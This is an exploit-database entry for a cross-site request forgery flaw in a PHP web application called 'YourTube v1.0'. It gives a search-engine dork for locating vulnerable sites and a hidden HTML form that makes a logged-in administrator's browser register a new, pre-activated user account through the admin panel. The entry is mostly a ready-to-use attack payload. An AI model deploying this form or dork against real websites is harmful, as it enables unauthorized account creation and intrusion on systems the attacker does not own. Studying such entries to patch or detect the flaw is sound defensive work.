YourTube v1.0 CSRF Vulnerability (Add User)

2011-01-03T00:00:00
ID 1337DAY-ID-15272
Type zdt
Reporter AtT4CKxT3rR0r1ST
Modified 2011-01-03T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ####################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [[email protected]]
.:. Script         : http://www.ac4p.com/
.:. Dork           : inurl:"Powered by YourTube v1.0"
 
####################################################################
 
===[ Exploit ]===
 
<form method="POST" name="form0" action="http://localhost/card/admincp/users.php">
<input type="hidden" name="action" value="Register"/>
<input type="hidden" name="vusername" value="user1"/>
<input type="hidden" name="vpass" value="123456"/>
<input type="hidden" name="email" value="[email protected]"/>
<input type="hidden" name="gender" value="m"/>
<input type="hidden" name="country" value="palestine"/>
<input type="hidden" name="altoge" value="My signature"/>
<input type="hidden" name="activated" value="1"/>
</form>
 
</body>
</html>
 
####################################################################



#  0day.today [2018-04-09]  #